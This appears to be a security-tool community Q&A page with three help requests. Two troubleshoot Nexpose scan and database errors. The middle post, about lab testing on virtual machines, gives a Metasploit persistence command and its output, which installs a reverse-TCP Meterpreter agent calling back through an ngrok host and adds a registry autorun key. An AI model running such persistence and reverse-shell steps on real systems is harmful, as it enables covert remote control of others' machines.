Knowledge Base

Questions

4

I have installed and attempted to run and got the logs attached as errors.

Issues with Nexpose community trial. Here's the log:

2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] Logging initialized. [Name = scanLogger-2] [Level = INFO, WARN, ERROR] [Timezone = America/New_York (Eastern Standard Time, GMT-5:00)]
2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Scan for site xxxxxxx.com started by policysup.
2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Debug logging is not enabled for this scan.
2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] ACES logging is not enabled.
2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Enabling of Windows Services is off.
2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Invulnerable Data Storage is on.
2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Nmap Host Discovery Ignore TCP Reset is off.
2018-03-01T02:14:14 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Nmap ARP Ping for local networks is on.
2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] [Engine ID: 3(local)] Checking if engine is online.
2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] [Engine ID: 3(local)] Engine is online.
2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Scan for site xxxxxxx.com started by policysup.
2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Initializing alerters.
2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] [Scan ID: 2] Starting scan against xxxxxxx.com with scan template: full-audit-without-web-spider.
2018-03-01T02:14:39 [INFO] [Thread: http-nio-3780-exec-11=/data/site/2/scan] [Site: xxxxxxx.com] Initializing alerters.
2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine hostname: DESKTOP-CJUFJQT/192.168.1.74
2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine serial number: 5CCE875D314BBF7CF792EB8FE72BFF5D1740BEF9
2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan engine version: 6.5.7
2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last product update ID: 4239920555 (2018-02-22)
2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last content update ID: 3471063746 (2018-02-20)
2018-03-01T02:14:39 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Last auto content update ID: 1580990612 (2018-02-28)
2018-03-01T02:14:46 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loading plugins.
2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing WindowsPolicyScanner policy scans.
2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing NotesPolicyScanner policy scans.
2018-03-01T02:14:50 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing web scans.
2018-03-01T02:14:51 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] This engine is not licensed for performing OraclePolicyScanner policy scans.
2018-03-01T02:14:51 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.nse.CheckProcessor.disableVulnerabilityCheckSynchronization is not configured - returning default value true.
2018-03-01T02:14:54 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 28 Jess rules in module ACCTSCAN
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 38745 Jess rules in module VULNSCAN
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 0 Jess rules in module DOSSCAN
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Generated 38773 Jess rules from 355849 vulnerability checks
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating network scanning globals.
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating default services mapper with default-services.properties.
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Creating VMware update mapper with: C:\Program Files\rapid7\nexpose\plugins\java\1\VMwarePatchScanner\1\update-id.properties
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Loaded 160 built-in trusted certificates.
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.timeout is not configured - returning default value 3600000.
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.socketExceptionLimit is not configured - returning default value 7.
2018-03-01T02:15:36 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.net.protocol.fingerprinter.minimumPreference is not configured - returning default value 0.0.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan startup took 58 seconds
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Non-EPSEC scan
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.isEnabled is not configured - returning default value true.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.expressionsEvaluatorFrequency is not configured - returning default value 60000.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.connectTimeout is not configured - returning default value 30000.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.remoteClosedTimeout is not configured - returning default value 500.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.tcpPort.failureLimit is not configured - returning default value 3.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.networkNode.concurrencyLimit is not configured - returning default value 8.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] com.rapid7.nexpose.scanTargetMonitor.networkNode.failureLimit is not configured - returning default value 32.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: IPV4 ARGUMENTS: C:\Program Files\rapid7\nexpose\nse\nmap\nmap.exe --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -sS -sU -O --osscan-guess --max-os-tries 1 -p T:1-1040,1080,1125,1194,1214,1220,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812-1813,1953,1959,2000,2002,2030,2049,2100,2200,2222,2301,2381,2401,2433,2456,2500,2556,2745,3000-3001,3121,3127-3128,3230-3235,3268-3269,3306,3339,3389,3460,3527,4000,4045,4100,4242,4430,4443,4661-4662,4711,4786,4848,5000,5010,5059-5061,5101,5180,5190-5193,5250,5432,5554-5555,5560,5566,5631,5678,5800-5803,5900-6009,6101,6106,6112,6346,6588,6777,7001-7002,7070,7100,7510,7777-7778,8000-8001,8004-8005,8008,8080-8083,8098-8100,8180-8181,8383-8384,8443-8444,8470-8480,8500,8866,8888,9090,9100-9102,9343,9470-9476,9480,9495,9996,9999-10000,10025,10168,11211,12345-12346,13659,16080,18181-18185,18207-18208,18231-18232,19190-19191,20034,22226,27017,27374,27665,31337,32764,32771,33333,49152,49400,50000,51080,51443,54320,60000,60148,63148,U:7,9,11,13,17,19,37,53,67-69,88,111,123,135,137-139,161-162,177,213,259-260,445,464,500,514,520,523,623,631,749-751,1194,1434,1701,1812-1813,1900,2049,2746,3230-3235,3401,4045,4500,4665-4666,4672,5059-5061,5351,5353,5632,6429,7777,9100-9102,11211,17185,18233,23945,26000-26004,26198,27015-27030,27444,27960-27964,30720-30724,31337,32771,34555,44400,47545,49152,54321 --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 -oX - -v
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: IPV6 ARGUMENTS: C:\Program Files\rapid7\nexpose\nse\nmap\nmap.exe --privileged -n -PE -PS21-23,25,53,80,110-111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-162,445,500,514,520,631,1434,1900,4500,5353,49152 -sS -sU -O --osscan-guess --max-os-tries 1 -p T:1-1040,1080,1125,1194,1214,1220,1352,1433,1500,1503,1521,1524,1526,1720,1723,1731,1812-1813,1953,1959,2000,2002,2030,2049,2100,2200,2222,2301,2381,2401,2433,2456,2500,2556,2745,3000-3001,3121,3127-3128,3230-3235,3268-3269,3306,3339,3389,3460,3527,4000,4045,4100,4242,4430,4443,4661-4662,4711,4786,4848,5000,5010,5059-5061,5101,5180,5190-5193,5250,5432,5554-5555,5560,5566,5631,5678,5800-5803,5900-6009,6101,6106,6112,6346,6588,6777,7001-7002,7070,7100,7510,7777-7778,8000-8001,8004-8005,8008,8080-8083,8098-8100,8180-8181,8383-8384,8443-8444,8470-8480,8500,8866,8888,9090,9100-9102,9343,9470-9476,9480,9495,9996,9999-10000,10025,10168,11211,12345-12346,13659,16080,18181-18185,18207-18208,18231-18232,19190-19191,20034,22226,27017,27374,27665,31337,32764,32771,33333,49152,49400,50000,51080,51443,54320,60000,60148,63148,U:7,9,11,13,17,19,37,53,67-69,88,111,123,135,137-139,161-162,177,213,259-260,445,464,500,514,520,523,623,631,749-751,1194,1434,1701,1812-1813,1900,2049,2746,3230-3235,3401,4045,4500,4665-4666,4672,5059-5061,5351,5353,5632,6429,7777,9100-9102,11211,17185,18233,23945,26000-26004,26198,27015-27030,27444,27960-27964,30720-30724,31337,32771,34555,44400,47545,49152,54321 --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 -oX - -v -6
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap phase started.
2018-03-01T02:15:37 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap will scan 1024 IP addresses at a time.
2018-03-01T02:15:38 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Nmap scan of 1 IP address starting.
2018-03-01T02:15:39 [INFO] [Thread: Scan 2:nmap:stdin] [Site: xxxxxxx.com] Nmap task Ping Scan started.
2018-03-01T02:15:45 [WARN] [Thread: Scan 2:nmap:stdin] [Site: xxxxxxx.com] NMAP: EXCEPTION: STDIN: java.io.IOException: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[11,1]
Message: XML document structures must start and end within the same entity.
    at com.rapid7.nexpose.scan.nmap.xml.NmapXMLOutputCallback.handle(Unknown Source) ~[nxshared.jar:na]
    at com.rapid7.nexpose.scan.nmap.NmapInputStreamRunnable.run(Unknown Source) [nxshared.jar:na]
    at java.lang.Thread.run(Thread.java:745) [na:1.8.0_102]
Caused by: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[11,1]
Message: XML document structures must start and end within the same entity.
    at com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.next(XMLStreamReaderImpl.java:596) ~[na:1.8.0_102]
    at com.rapid7.xml.stax.XMLStreamReaderHelper.getNextSiblingElement(Unknown Source) ~[r7shared.jar:na]
    ... 3 common frames omitted
2018-03-01T02:15:45 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] NMAP: PROCESS: EXIT VALUE: 255
2018-03-01T02:15:45 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan failed: java.io.IOException: The Nmap exit value is not zero: 255
    at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source)
    at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source)
    at com.rapid7.nexpose.scan.Scan.start(Unknown Source)
    at com.rapid7.nexpose.scan.Scan.run(Unknown Source)
    at java.lang.Thread.run(Thread.java:745)
2018-03-01T02:15:50 [INFO] [Thread: scan-executor-service-5] [Site: xxxxxxx.com] Scan failed: java.io.IOException: The Nmap exit value is not zero: 255
    at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source)
    at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source)
    at com.rapid7.nexpose.scan.Scan.start(Unknown Source)
    at com.rapid7.nexpose.scan.Scan.run(Unknown Source)
    at java.lang.Thread.run(Thread.java:745)
2018-03-01T02:15:51 [INFO] [Thread: scan-executor-service-5] [Site: xxxxxxx.com] Scan discovered 0 live devices, 0 vulnerabilities.
2018-03-01T02:16:23 [INFO] [Thread: Scan 2] [Site: xxxxxxx.com] Scan discovered 0 live devices, 0 vulnerabilities.

Posted by Sherman about a year ago

1

Reverse TCP persistence doesn't work over internet

Hey guys. I've been playing around with some reverse shells on a couple virtual machines and I've recently gotten it to work over the internet using ngrok to port forward to my local computer, which works great, except for the fact that the "run persistence" attack doesn't work. I've never had problems with "run persistence" when testing on a local network. The command will execute and go through without any errors and it also installs the persistence files on the target, but it doesn't actually execute the persistence script on the target and doesn't report back once the user reboots. If I manually click on the .vbs file on the target, then it'll work and it'll reconnect if I exit the session, so the settings should be good. It still doesn't run the script on start up though.

This is the command I run:

run persistence -r (IP) -p (port) -i 5 -U -X

This is the output:

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DESKTOP-VH5Q39J_20180216.4315/DESKTOP-VH5Q39J_20180216.4315.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11086
[*] Persistent agent script is 99634 bytes long
[+] Persistent Script written to C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs
[*] Executing script C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs
[+] Agent executed with PID 4500
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW

What's going on? How do I get it to work? I would really appreciate if you guys could help me out! Thanks in advance!

Posted by Ernst Reberto about a year ago

1

Nexpose nxpgsql FATAL semctl()

Hi. It's a problem for me:

"The Security Console is running in maintenance mode, which enables it to perform necessary internal tasks or to recover from the critical failure of one or more of its subsystems. You will not be able to run scans or generate reports while the Security Console is in maintenance mode. For more information, please see the topic Running VM in Maintenance Mode in the VM Administrator's Guide"

nsc.log:

2018-02-13T11:09:26 [INFO] [Thread: Security Console] Creating NSC config for database type postgresql.
2018-02-13T11:09:26 [INFO] [Thread: Security Console] Starting up postgresql DB system
2018-02-13T11:09:26 [INFO] [Thread: Security Console] PostgreSQL service status: 0.
2018-02-13T11:09:27 [INFO] [Thread: Security Console] PostgreSQL service status: 1.
2018-02-13T11:09:28 [ERROR] [Thread: Security Console] A critical error occured during initialization
org.postgresql.util.PSQLException: FATAL: semctl(12582919, 3, SETVAL, 0) failed: Invalid argument
    at org.postgresql.core.v3.ConnectionFactoryImpl.doAuthentication(ConnectionFactoryImpl.java:443) ~[postgresql-9.4.1212.jar:9.4.1212]
    at org.postgresql.core.v3.ConnectionFactoryImpl.openConnectionImpl(ConnectionFactoryImpl.java:217) ~[postgresql-9.4.1212.jar:9.4.1212]
    at org.postgresql.core.ConnectionFactory.openConnection(ConnectionFactory.java:52) ~[postgresql-9.4.1212.jar:9.4.1212]
    at org.postgresql.jdbc.PgConnection.<init>(PgConnection.java:216) ~[postgresql-9.4.1212.jar:9.4.1212]

Any suggestions? Thanks

Posted by John Sartana about a year ago